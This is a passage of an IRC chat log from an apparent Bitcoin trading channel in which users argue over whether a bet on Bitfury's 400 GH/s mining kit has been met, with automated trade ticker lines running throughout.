of 256 chips.. Aug 31 23:36:46 tyrion70: thats exactly what I placed my bet on. Aug 31 23:36:47 both based on the same initial bet text.. Aug 31 23:36:52 [HAVELOCK] [LABCO] 3 @ 0.0032 = 0.0096 BTC [+] Aug 31 23:37:00 they had to add more chips, making them to break that promise Aug 31 23:37:02 [BTCTC] [LABCOIN] 70 @ 0.0037 = 0.259 BTC [+] Aug 31 23:37:07 'No way they can get 400GH out of 256 chips' Aug 31 23:37:15 Anduck: and the promise was broken because the performance was not met Aug 31 23:37:25 [BTCTC] [LABCOIN] 639 @ 0.0037 = 2.3643 BTC [+] Aug 31 23:37:34 and that statement "could be" covered by the original bid text.. Aug 31 23:37:35 [BTCTC] [ASICMINER-PT] 1 @ 2.477 BTC [-] Aug 31 23:37:42 how? Aug 31 23:37:44 i think it can't. Aug 31 23:38:17 Anduck: tyrion is saying that the bet can be viewed from a 'customer' perspective or a 'technical' perspective.... depending on which one, the bet can be a yes or no. Aug 31 23:38:21 why not? think two weeks back.. Aug 31 23:38:29 i don't agree with that technical perspective Aug 31 23:38:32 let me explain why Aug 31 23:38:48 ok Aug 31 23:39:06 .bait Aug 31 23:39:11 http://24.media.tumblr.com/tumblr_m1an53Gy861qezyuno1_1280.jpg Aug 31 23:39:21 one looks that yeah they can't make 256 produce 400gh at <400W. but if 256 chips don't make 400gh, it isn't a 400gh unit, right? Aug 31 23:39:32 so they had to add more chips to make the 400gh unit. Aug 31 23:39:43 still it had to draw max 400 W in total Aug 31 23:40:01 if they added GPU's, it would break the performance promise since it would eat more than 400 wattas Aug 31 23:40:20 so they only broke the promise of hardware amount, they couldn't make the 400gh unit out of 1 m-board only Aug 31 23:40:29 yeah i see where you are going.. Aug 31 23:40:33 [BTCTC] [ASICMINER-PT] 5 @ 2.477 = 12.385 BTC [-] Aug 31 23:40:36 Anduck: Thats not what the bet says... the kit says 256 chips do 400Gh. Aug 31 23:40:40 .bait Aug 31 23:40:45 http://24.media.tumblr.com/tumblr_m4w2pgVaZ21r21xm5o1_1280.jpg Aug 31 23:40:54 but can you at least imagine that ppl bet on 256 chips doing 400 gh based on the information from the bet Aug 31 23:41:02 the site says kit makes 400gh and includes 256 chips Aug 31 23:41:02 There are 2 metrics for performance. -- hashrate, and Wattage. It has to meet BOTH. Aug 31 23:41:10 the kit makes 400gh and includes more than 256 chips. Aug 31 23:41:20 they broke the hw amount promise, not the performance promise of the kit Aug 31 23:41:53 not according to the ppl that bet on the 256 chips being one unit.. Aug 31 23:42:01 so it does 400gh for <400W? Aug 31 23:42:16 300 chips do > 400gh for <400w Aug 31 23:42:19 regardless of number of chips, which aren't in the bet Aug 31 23:42:19 Anduck: The HW promise IS the performance promise! Imagine if you are running a server farm, and Intel says --- "oh, sorry, our chips aren't fast enough --, but heres 1000 extra servers. Oh, you can't fit them in your datacenter because you ran out of space? too bad!!" Aug 31 23:42:26 tyrion70: the bet doesn't require the unit to include 256 chips Aug 31 23:42:28 [BTCTC] [ACTIVEMINING] 28 @ 0.004135 = 0.1158 BTC [-] Aug 31 23:42:30 don't care about the nubem of chips Aug 31 23:42:39 pankkake: yes. But thats not what the bet says. Aug 31 23:42:40 does it do 400gh for <400W? Aug 31 23:42:44 pankkake: yes Aug 31 23:42:45 pankkake: No, it doesn't Aug 31 23:42:48 lol Aug 31 23:42:51 both Aug 31 23:42:54 you order 400gh, you get 400gh at <400W Aug 31 23:42:56 so yes, it does. Aug 31 23:42:57 again, you are both right.. Aug 31 23:43:04 depending on the perspective.. Aug 31 23:43:05 ok, rewriting my question: does it do <1W per gh? Aug 31 23:43:06 i am fucking more right than him goddamnit KIDDORAGE INCOMING Aug 31 23:43:12 hahaha Aug 31 23:43:13 pankkake: yes Aug 31 23:43:19 ok, that's interesting Aug 31 23:43:33 and the unit does >400 gigahashes, too Aug 31 23:43:34 pankkake: 400Gh miner -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- as advertised -- which is what was required by the bet -- only does 365Gh Aug 31 23:43:39 honestly, I think it should resolve as yes then Aug 31 23:43:45 (and it means I lose my bet) Aug 31 23:43:59 but the bet does not mention chips or boards or whatever Aug 31 23:44:00 the bet required the unit to produce 400gh at <400W. it does that, even though it does that with more chips than announced Aug 31 23:44:05 it mentions performance, watts, hashes Aug 31 23:44:07 pankkake: well, its a no, if you read the bet language. Aug 31 23:44:13 the bet describes a unit.. Aug 31 23:44:22 [BTCTC] [CRYPTO-TRADE] 5 @ 0.1986 = 0.993 BTC [-] Aug 31 23:44:25 but there is no such thing as a unit... Aug 31 23:44:36 [BTCTC] [PETA-MINE] 9 @ 0.65 = 5.85 BTC [+] Aug 31 23:44:39 "Devices must meet advertised performance" Aug 31 23:44:41 so anducks definition of a unit being "whats in the box" Aug 31 23:44:45 is correct.. Aug 31 23:44:45 they meet the *performance* Aug 31 23:44:48 it says 25gh unit and 400gh unit - bfsb sold 25gh kit and 400gh kit. so you can pretty much make the assumption that kit=unit there,right? Aug 31 23:44:48 midnightmagic MiningBuddy mircea_popescu mitty mius mixdio Aug 31 23:44:50 ;;eauth mircea_popescu Aug 31 23:44:51 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Aug 31 23:44:53 pankkake: They did not meet ADVERTISED performance. Aug 31 23:44:59 and fractals definition of 256 chips is correct to.. Aug 31 23:45:07 number of chips is not performance Aug 31 23:45:12 pankkake: 400Gh miner -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- as advertised -- only does 365Gh Aug 31 23:45:14 tyrion70: the bet was about the unit performance, not about the unit chip amount Aug 31 23:45:19 ;;everify freenode:#bitcoin-otc:092252d47f975c33c80bb11e036eb00c1983a43e1d2c0f5a34031c4d Aug 31 23:45:21 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Aug 31 23:45:29 ;;rate ted_stanley 1 Coder guy. Aug 31 23:45:30 Rating entry successful. Your rating of 1 for user ted_stanley has been recorded. Aug 31 23:45:47 yes and no.. Aug 31 23:45:57 yes a unit is a kit.. Aug 31 23:46:07 but the definiton of a kit is not in the bet.. Aug 31 23:46:09 a kit was promised to do 400 ghash and it does that Aug 31 23:46:20 pankkake: Hashrate for the 400Gh kit/unit as defined by the hardware, as advertsied , was not met. Aug 31 23:46:28 Anduck: No, it only does 365Gh Aug 31 23:46:32 sorry Aug 31 23:46:43 but one ordered 400gh kit and got 400gh? Aug 31 23:46:44 hence it can be read as "what I receive when I order one" or "1 m board 16 h boards and 256 chips" Aug 31 23:46:47 2 Kits do > 400Gh Aug 31 23:46:52 1 Kit does < 400Gh Aug 31 23:47:04 i buy 1 kit, i get >400gh Aug 31 23:47:06 wtf? Aug 31 23:47:11 Anduck: Thats not what the bet says. Aug 31 23:47:15 lol? Aug 31 23:47:25 400gh kit does 400gh, thats what the bet says Aug 31 23:47:29 we already accepted that kit=unit Aug 31 23:47:32 incidentally, is this bitfury pcb stuff pretty much the most open/modder friendly asic miner to date ? Aug 31 23:47:32 the kit does 400gh Aug 31 23:47:40 mircea_popescu: yup Aug 31 23:47:46 The bet says the 400Gh UNIT as advertised -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- must be at least 400Gh -- it is not. Aug 31 23:47:48 it seems impressignly open Aug 31 23:47:58 yeah it looks great Aug 31 23:47:59 fractal: the chip count is different, performance of the unit is not Aug 31 23:48:03 now I want one Aug 31 23:48:07 the chips can be run at >3 GH Aug 31 23:48:12 pankkake they certainly did the pr right. Aug 31 23:48:15 Anduck: the performance was not met. It is only 365Gh. Aug 31 23:48:16 at bfsb boards they do max 1,5 Aug 31 23:48:23 fractal: i order 400gh unit, i get 400gh. Aug 31 23:48:45 Anduck: The bet only talks about the performance of the unit -- Aug 31 23:49:00 which is -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- must be at least 400Gh -- it is not. Aug 31 23:49:01 and i get a 400gh unit and it does the 400gh? chip count changed, yes Aug 31 23:49:06 No, it doesn't. Aug 31 23:49:12 it only does 365Gh Aug 31 23:49:12 but it does? Aug 31 23:49:14 they spent more time working on the miner than on the PR and cases, it seems Aug 31 23:49:29 i get a 400gh KIT which is same as 400gh UNIT as we already accepted. Aug 31 23:49:33 yup Aug 31 23:49:40 the chip itself is awesome Aug 31 23:49:48 Anduck: proof that the 400Gh kit is what I describe --- http://thegenesisblock.com/bitfury-400-ghs-bitcoin-mining-rig-hits-us-shores/ Aug 31 23:49:57 fractal: the link is not part of the bet Aug 31 23:49:59 You are now disagreeing with thegensisblock also Aug 31 23:50:06 only bitfurystrikesback.com is referred to Aug 31 23:50:24 [BTCTC] [PETA-MINE] 6 @ 0.65 = 3.9 BTC [+] Aug 31 23:50:25 and bitfurystrikesback says 400gh kit (unit) will deliver 400gh at <400W. this was met Aug 31 23:50:31 That's a picture of the kit/unit. it doeesn't do 400Gh.... Aug 31 23:50:36 No it doesn't Aug 31 23:50:42 it's a picture of 1 m-board filled with 16 h-cards Aug 31 23:50:44 the 400Gh UNIT as advertised -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- must be at least 400Gh -- it is not. Aug 31 23:50:52 [BTCTC] [DMS.MINING] 7 @ 0.003376 = 0.0236 BTC [+] Aug 31 23:50:53 [BTCTC] [DMS.MINING] 52 @ 0.003376 = 0.1756 BTC [+] Aug 31 23:51:01 [BTCTC] [PETA-MINE] 115 @ 0.65 = 74.75 BTC [+] Aug 31 23:51:20 i think the conclusion of the story is buy s.bbet Aug 31 23:51:22 bitfurystrikesback says 400gh kit (same as 400 gh unit as we accepted) will deliver 400gh at <400W. this was met. the chip count though was changed from 256 to more. Aug 31 23:51:48 kakobrekla: I'm waiting for the TAT PT Aug 31 23:51:52 Anduck: Thats not what the bet says. the bet says a 400Gh miner, as advertised -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- must be at least 400Gh -- it is not. Aug 31 23:52:08 dude read what i wrote Aug 31 23:52:09 read it with care Aug 31 23:52:16 Read what I wrote with care as well. Aug 31 23:52:19 i did. Aug 31 23:52:26 they failed that. they had to ship more hw to make the unit Aug 31 23:52:28 I did. Aug 31 23:52:33 but thats not part of the goddamn bet Aug 31 23:52:39 [BTCTC] [PETA-MINE] 3 @ 0.65 = 1.95 BTC [+] Aug 31 23:52:43 Which means the bet is a no. they shipped more because they missed on performance. its the same as a refund. Aug 31 23:53:01 the unit changed from 1 m-board filled with 16 h-cards to 2 m-boards with 19 h-cards. so they failed this.. but the UNIT does as performed Aug 31 23:53:32 [BTCTC] [ASICMINER-PT] 1 @ 2.476 BTC [-] Aug 31 23:53:37 Anduck: The fact is that people betting on bitbet.us can ONLY go by what the language of the bet says --- The bet says a 400Gh miner, as advertised, must be 400Gh.... The advertised Miner was -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- it is onlt 365Gh. Aug 31 23:53:59 [MPEX] [S.BBET] 5325 @ 0.00069999 = 3.7274 BTC [-] Aug 31 23:54:00 the advertised miner performance, which the bet is about, is 400gh at <400W. Aug 31 23:54:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.02399 = 0.048 BTC [+] Aug 31 23:54:09 Anduck: the fact that they had to do that, means that they missed performance on their 400Gh 'kit' and the bet is a no. Aug 31 23:54:14 the amount of hardware for the unit changed but it's not part of the bet Aug 31 23:54:23 Anduck: Thats not what the bet says Aug 31 23:54:27 the bet mentions advertised performance, not advertised specs Aug 31 23:54:30 indeed Aug 31 23:54:43 the bet doesn't require the unit/kit to be 1 m-board with 16 h-boards Aug 31 23:54:46 [BTCTC] [TAT.ASICMINER] 14 @ 0.023 = 0.322 BTC [-] Aug 31 23:54:58 it requires the unit/kit to perform as promised, that is 25gh at 40W or 400gh at 400W Aug 31 23:55:20 [BTCTC] [ACTIVEMINING] 2 @ 0.004302 = 0.0086 BTC [+] Aug 31 23:55:45 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [-] Aug 31 23:55:47 [BTCTC] [TAT.ASICMINER] 50 @ 0.023 = 1.15 BTC [-] Aug 31 23:56:05 pankkake: it says the performance of a UNIT AS ADVERTISED. The advertised 400Gh Miner was -- "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- it is onlt 365Gh. Aug 31 23:56:07 [BTCTC] [TAT.ASICMINER] 50 @ 0.023 = 1.15 BTC [-] Aug 31 23:56:29 it's not performance, and what is performance is mentionned in the bet Aug 31 23:56:35 [BTCTC] [ASICMINER-PT] 3 @ 2.475 = 7.425 BTC [-] Aug 31 23:56:37 stop copy/pasting that line it's annoying Aug 31 23:56:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.02251 = 0.045 BTC [-] Aug 31 23:56:39 [BTCTC] [TAT.ASICMINER] 47 @ 0.0225 = 1.0575 BTC [-] Aug 31 23:56:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.0225 = 0.0675 BTC [-] Aug 31 23:56:57 pankkake: yes, and the unit mentioned in the bet failed on performance. Aug 31 23:57:05 :| Aug 31 23:57:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.02233 = 0.067 BTC [-] Aug 31 23:57:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.02232 BTC [-] Aug 31 23:57:08 [BTCTC] [TAT.ASICMINER] 30 @ 0.02232 = 0.6696 BTC [-] Aug 31 23:57:10 no it doesn't say "performance of the unit as advertised". it says "must meet advertised performance (25 GH/s unit 40W, 400 GH/s unit 400W) " Aug 31 23:57:32 and the 400Gh unit is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- which only does 365Gh. Aug 31 23:57:35 and we agreed already that unit is the same thing as the kit. Aug 31 23:57:44 and 1 kit is 1-mboard. Aug 31 23:57:44 the kits are promised as the parenthesis says and that is met Aug 31 23:57:47 no Aug 31 23:57:51 it was meant to be Aug 31 23:57:52 yes. Aug 31 23:57:54 please stop mentionning chips Aug 31 23:57:55 but it's more than that Aug 31 23:58:01 that is what was advertised, and that is what the language of the bet says Aug 31 23:58:04 [BTCTC] [PETA-MINE] 7 @ 0.65 = 4.55 BTC [+] Aug 31 23:58:13 so they failed that part? but not the performance of the kit? Aug 31 23:58:19 All that matter is the language of the bet. that is why people make NO/YES bets. based on the language of the bet Aug 31 23:58:31 Anduck: the 400Gh Kit failed on performance. Aug 31 23:58:52 A 400Gh kit is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Aug 31 23:58:54 the language says that the kit must perform as promised. the kit perform promise is at the bfsb shop: Aug 31 23:58:54 Performance: Aug 31 23:58:54 400GHash/s Aug 31 23:58:54 Total power draw max. 400W (Efficiency at wall depends on your PSU) Aug 31 23:59:09 No, it doesn't perform as promised Aug 31 23:59:12 why not just wait a few hours and see what it resolves to? Aug 31 23:59:56 order 400gh unit -> get 400gh mining power at promised efficiency. how does it not perform as promised? Sep 01 00:00:16 Because the 400Gh unit only hashes at 365Gh. Sep 01 00:00:18 there was no promise of the hardware to perform X way, only the kit Sep 01 00:00:29 And a kit is "is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Sep 01 00:00:36 which only performs at 365gh Sep 01 00:00:38 you must mean that 1 m-board + 16 h-boards only does 365 gh? Sep 01 00:00:57 the kit is 400gh at <400W. that's the important part Sep 01 00:01:06 the kit hardware got changed, performance didn't Sep 01 00:01:06 Not according to the language of the bet.... Sep 01 00:01:12 Thats not what the bet says Sep 01 00:01:22 the bet says that only advertised performance of the kit must be met Sep 01 00:01:24 and that is met. Sep 01 00:01:32 we already agreed that the kit is the same as the unit. Sep 01 00:01:40 No, its not met -- a kit is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips". It does not do 400Gh. Sep 01 00:01:44 [BTCTC] [PETA-MINE] 5 @ 0.65 = 3.25 BTC [+] Sep 01 00:01:58 a kit was meant to be that hardware, yes. but it failed that. it's more hardware Sep 01 00:02:01 the bet does not fucking mention chips and boards Sep 01 00:02:08 still performs as promised but with more hardware than promised Sep 01 00:02:10 INDEED Sep 01 00:02:14 Which, according to the language of the bet, means it missed performance. Sep 01 00:02:15 it only mentions the KIT performance Sep 01 00:02:22 chips and boards is not performance Sep 01 00:02:25 it is fucking irrelevant Sep 01 00:02:28 fuck Sep 01 00:02:34 indeed but fractal can't understand it :( Sep 01 00:02:35 pankkake: It mentions a UNIT - which is is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips". its not irrelevant. sorry. Sep 01 00:02:45 pankkake: sorry. its not irrelevant. because english. Sep 01 00:02:49 fractal: unit is a kit as we already talked before. Sep 01 00:03:03 you ignore "performance" but yet focus on "unit" Sep 01 00:03:08 what do you think is more important? Sep 01 00:03:45 Anduck: which is is "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" - which does not do 400Gh Sep 01 00:03:49 they said that 400gh kit will have 256 chips to make the 400gh. they had to add more chips. and the kit does 400gh Sep 01 00:03:59 pankkake: all conditions of the bet must be met for it to be a yes. All conditions were not met. The unit/kit in question does not perform at 400Gh. Sep 01 00:04:09 Anduck: Thats not what the language of the bet says. Sep 01 00:04:11 fractal: yeah that 1 m-board + 16 h-boards wasn't enough for a kit, they had to add more hw Sep 01 00:04:16 more chips to make the 400gh kit Sep 01 00:04:21 performance of the kit didn't change Sep 01 00:04:36 the bet wasn't about kit chip amount Sep 01 00:04:36 which means they missed performance. So the 400Gh kit in question at the time the bet was made, did not meed performance. Sep 01 00:05:02 [HAVELOCK] [AM100] 10 @ 0.02469 = 0.2469 BTC [+] Sep 01 00:05:08 the 400gh kit is 400gh kit, dependless of the chip amount it includes. it was only about that the 400gh kit will make 400gh at promised efficiency Sep 01 00:05:15 Again, thats not what the bet says. Sep 01 00:05:25 that is actually right what the bet says Sep 01 00:05:32 must meet advertised performance (25 GH/s unit 40W, 400 GH/s unit 400W) Sep 01 00:05:39 And the 400Gh unit is 365Gh. Sep 01 00:05:42 and we already agreed unit is same as kit Sep 01 00:05:52 and i can get the logs about that why it is so Sep 01 00:06:11 the kit does >400gh as promised. Sep 01 00:06:13 UNIT is 1 KIT of 1-mboard. anything more then that is no longer a single unit or kit. Sep 01 00:06:20 Anduck: No, it doesn't. it is only 365Gh. Sep 01 00:06:36 the 400gh unit includes more chips than promised, yes. but the performance is the same Sep 01 00:06:59 the performance is as promised, that's only thing that is important for the bet Sep 01 00:07:01 They shipped more hardware, and are by far the best ASIC manufactuerer so far, and I will order from them... and they've done a great job..... but that has nothing to do with the bet language Sep 01 00:07:07 [BTCTC] [LABCOIN] 26 @ 0.00365 = 0.0949 BTC [-] Sep 01 00:07:08 [BTCTC] [LABCOIN] 120 @ 0.00365 = 0.438 BTC [-] Sep 01 00:07:10 [BTCTC] [LABCOIN] 25 @ 0.00365 = 0.0913 BTC [-] Sep 01 00:07:11 [BTCTC] [LABCOIN] 80 @ 0.003626 = 0.2901 BTC [-] Sep 01 00:07:12 [BTCTC] [LABCOIN] 150 @ 0.003622 = 0.5433 BTC [-] Sep 01 00:07:13 [BTCTC] [LABCOIN] 299 @ 0.003621 = 1.0827 BTC [-] Sep 01 00:07:23 Anduck: The performance of the 400Gh UNIT is only 365Gh. Sep 01 00:07:25 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] Sep 01 00:07:25 sorry. Sep 01 00:07:30 doesn't matter does the miner color or size or chip amount change. it performs as promised. the kit said 400gh at <400W and thats what they delivered. Sep 01 00:07:36 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] Sep 01 00:07:43 and the kit is the same as unit in the bet description Sep 01 00:07:45 as we already agreed Sep 01 00:07:46 [HAVELOCK] [CFIG] 1 @ 0.1699 BTC [+] Sep 01 00:07:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.02299 = 0.046 BTC [+] Sep 01 00:07:54 You are trying to change what you meant after the fact.... when the bet started -- everyone assumed that a 400Gh KIT was "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Sep 01 00:08:03 yeah they di Sep 01 00:08:05 yup Sep 01 00:08:16 but the bet wasn't about that to be as promised Sep 01 00:08:23 the bet was about the kit hashrate and efficiency Sep 01 00:08:30 not the chip amount Sep 01 00:08:42 the kit includes a lot more than only m-boards and h-boards Sep 01 00:08:44 You can't change after the fact what UNIT was supposed to mean. Also. Nobody who ordered a 400Gh unit actually got 2-mboards so far. Sep 01 00:08:58 the unit is the same as a kit as we've already talked earlier, right? Sep 01 00:08:59 the guy on the forums ordered a 400 kit AND a 25 kit Sep 01 00:09:09 he got 2 m-boards for the 400gh kit Sep 01 00:09:12 lol Sep 01 00:09:21 he got 20 h-boards Sep 01 00:09:37 so he got more chips than 256.. so they failed that, they had to add the chip count Sep 01 00:09:51 but the hashrate of 400gh unit is 400gh. (actually more). and the efficiency is as promised Sep 01 00:10:18 No. he got a 400gh KIT as advertised -- ""1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- which missed performance targets. that the compmany sent him more hardware has nothing to do with the fact that the 400Gh unit AS ADVERTISED is 365gh Sep 01 00:10:32 Again, you have to go by the language of the bet. Sep 01 00:12:05 When people placed the bet, all the information they had to go by was that a UNIT was , as advertised , "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" .... This is the only amount of hardware they were taking into consideration when making the bet. Sep 01 00:12:28 [BTCTC] [ACTIVEMINING] 8 @ 0.004302 = 0.0344 BTC [+] Sep 01 00:12:48 [HAVELOCK] [AM100] 1 @ 0.0247 BTC [+] Sep 01 00:13:12 [BTCTC] [ASICMINER-PT] 2 @ 2.471 = 4.942 BTC [-] Sep 01 00:13:14 [HAVELOCK] [SMG] 6 @ 0.0002102 = 0.0013 BTC [-] Sep 01 00:13:52 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Sep 01 00:13:57 400gh unit performance described at the bitfurystrikesback.com (the bet was about this only, not the chip or hardware amount) Sep 01 00:13:57 Performance: Sep 01 00:13:57 400GHash/s Sep 01 00:13:57 Total power draw max. 400W (Efficiency at wall depends on your PSU) Sep 01 00:14:00 [MPEX] [S.MPOE] 6208 @ 0.00087099 = 5.4071 BTC [-] Sep 01 00:14:20 so there's NOTHING unclear about this Sep 01 00:14:25 INCLUDED: "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" "1 Raspberry PI" Sep 01 00:14:39 if they have to ship more, the UNIT missed performance, and the bet is a no Sep 01 00:14:49 [BTCTC] [TAT.ASICMINER] 98 @ 0.02299 = 2.253 BTC [+] Sep 01 00:14:49 the unit missed hardware promise Sep 01 00:14:52 not performance promise Sep 01 00:14:59 yes they missed performance promise Sep 01 00:15:01 the unit does 400gh Sep 01 00:15:02 as advertised Sep 01 00:15:05 Performance: Sep 01 00:15:06 400GHash/s Sep 01 00:15:06 Total power draw max. 400W (Efficiency at wall depends on your PSU) Sep 01 00:15:07 no, the unit does 365Gh Sep 01 00:15:10 [BTCTC] [PETA-MINE] 10 @ 0.65 = 6.5 BTC [+] Sep 01 00:15:12 INCLUDED: "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Sep 01 00:15:18 they advertised 400gh for the unit and thats what it does Sep 01 00:15:19 I see you guys are still debating the bet Sep 01 00:15:28 rulother-tab: whats your opinion? Sep 01 00:15:30 Anduck: No, it does 365Gh Sep 01 00:15:30 [BTCTC] [TAT.ASICMINER] 98 @ 0.023 = 2.254 BTC [+] Sep 01 00:15:38 but the one who ordered it got 400gh? Sep 01 00:15:43 how is it 365 then? Sep 01 00:15:47 [HAVELOCK] [VTX] 1 @ 0.566 BTC [-] Sep 01 00:15:50 Anduck: Sure. but thats not what the bet says. Sep 01 00:16:12 the bet talks about advertised performance Sep 01 00:16:14 a UNIT was , as advertised , "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- this does not do 400Gh. Sep 01 00:16:14 I think if in the end it does the total hashing power then that's all that matters Sep 01 00:16:23 and it does that Sep 01 00:16:26 the unit does that Sep 01 00:16:28 if the bet resolves as Yes I would be happy because fractal will be unhappy. if the bet is No I will be happy because I get my money back. cool! Sep 01 00:16:39 rulother-tab: I agree, but thats not what the language of the bet says Sep 01 00:16:48 pankkake: wow, you are a jerk. Sep 01 00:16:53 no you are Sep 01 00:16:54 [HAVELOCK] [AM100] 20 @ 0.0247 = 0.494 BTC [+] Sep 01 00:16:59 Lol Sep 01 00:17:04 there's no way it should end up as a no since all the requirements are met. Sep 01 00:17:12 pankkake: I never wish other people to be unhappy. you're not very nice. Sep 01 00:17:29 All the requirements of the bet are not met.... The 400Gh unit is only 365Gh Sep 01 00:17:31 Welcome to the world of bitcoin Sep 01 00:17:43 [HAVELOCK] [XBOND] 35 @ 0.001189 = 0.0416 BTC [+] Sep 01 00:17:49 256 chips does that 365, full 400gh unit does 400gh Sep 01 00:17:57 the chip amount changed, allright? Sep 01 00:18:07 performance of the 400g unit DID not Sep 01 00:18:14 rulother-tab: Its great that they got more then what they ordered. But what is at debate here is what a 400Gh unit is. At the time the bet was made it was defined at "a UNIT was , as advertised , "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- and that only does 365Gh. which means all conditions of the bet are not met Sep 01 00:18:27 Anduck: The 400Gh unit is only 365Gh Sep 01 00:18:40 you're disengenious and keep repeating things about chips that are completely irrelevant Sep 01 00:18:51 you deserve to be unhappy Sep 01 00:18:54 pankkake: I'm repeating whats relevent to the bet. Sep 01 00:19:03 pankkake: again, you're a jerk. Sep 01 00:19:08 it's not Sep 01 00:19:25 and you're a bigger jerk Sep 01 00:19:40 yes it is, because people assumed the 400Gh unit was a UNIT was , "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" -- thats what they based their bet on.... to say otherwise is a bait and switch scam, fraud, and nothing more. Sep 01 00:20:05 pankkake: well, if you side with bait and switch fraudsters who can change the definition of a UNIT after the fact, then I guess i shouldn't worry about you calling me a jerk Sep 01 00:20:19 aren't you tired of copy/pasting? Sep 01 00:20:56 jezus guys.. i feel like an atheist in between catholics and jehova's witnesses Sep 01 00:21:02 [BTCTC] [BITVPS] 50 @ 0.002301 = 0.1151 BTC [-] Sep 01 00:21:09 this thing can only possibly get thicker. Sep 01 00:21:23 1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips 1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips 1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips 1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips 1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips 1 Master boar Sep 01 00:21:33 pankkake: absolutely. I'm sure Anduck is also tired of pretending a KIT/UNIT is more then what was advertised. Sep 01 00:22:09 it's actually more than advertised but that's not relevant Sep 01 00:22:25 it does the 400gh as promised, that is relevant. and that it does it at promised efficiency Sep 01 00:22:33 pankkake: No, it only does 365Gh. Sep 01 00:22:38 *anduck Sep 01 00:22:38 the chip amount has changed. this is not as relevant Sep 01 00:22:50 the 400Gh unit is infact a 365Gh unit. Sep 01 00:22:55 yeah with the old amount of chips it would do 365gh but the kit had to make 400gh so they had to add more chips Sep 01 00:23:03 ending up with a 400gh kit performing >400gh at <400W Sep 01 00:23:04 Thats not what the bet said. Sep 01 00:23:13 Again, we can only go by the language of the bet. Sep 01 00:23:20 the bet only addressed the promise of performance, not the promise of chip count Sep 01 00:23:22 what part of the bet mentions the number of chips? Sep 01 00:23:48 [BTCTC] [BMF] 2 @ 0.039 = 0.078 BTC [-] Sep 01 00:24:08 pankkake: as advertised. Sep 01 00:24:22 *performance* as advertised Sep 01 00:24:33 400Gh UNIT was advertised as "1 Master board 16 hashing boards with 16 Bitfury 55nm ASIC chips for total of 256 chips" Sep 01 00:24:39 this 'UNIT' is only 356Gh Sep 01 00:25:00 [HAVELOCK] [XBOND] 3 @ 0.00119 = 0.0036 BTC [+] Sep 01 00:25:07 [BTCTC] [PETA-MINE] 1 @ 0.65 BTC [+] Sep 01 00:25:17 :| Sep 01 00:25:28 on a lighter note, this reminds me of http://img40.imageshack.us/img40/3475/aglaw.jpg Sep 01 00:25:40 lol Sep 01 00:26:52 To be honest -- if there ever was a case to invalidate a bet -- i think this would be it... Sep 01 00:27:39 Hopefully everyone can learn a lesson from this -- and realize that bet language must be very specific. Sep 01 00:27:54 Otherwise people will try to change what a UNIT means after the fact Sep 01 00:28:43 why would the bet be invalidated? Sep 01 00:28:47 it's clear Sep 01 00:28:57 because you are both right... Sep 01 00:29:02 [MPEX] [S.MPOE] 1 @ 0.00087099 BTC [-] Sep 01 00:29:11 but the bet doesn't address the unit chip count right? Sep 01 00:29:26 it doesn't specify what a unit is.. so it might.. Sep 01 00:29:28 [MPEX] [S.MPOE] 1 @ 0.00087099 BTC [-] Sep 01 00:29:33 only the performance of the units that was 25gh and 400gh unit? the chip count that was promised got changed in both units, yes Sep 01 00:29:36 then again it might not.. Sep 01 00:29:43 [MPEX] [S.MPOE] 1 @ 0.00087099 BTC [-] Sep 01 00:29:52 but the bet doesn't talk about chip count Sep 01 00:29:58 [MPEX] [S.MPOE] 1 @ 0.00087099 BTC [-] Sep 01 00:30:00 it only talks about performance of the units Sep 01 00:30:09 yes but it does not define a unit.. Sep 01 00:30:10 Anduck: for the record, even MXRider calls them 2 units -- "Some info and pictures of my units: 400GH unit and 25GH unit." Sep 01 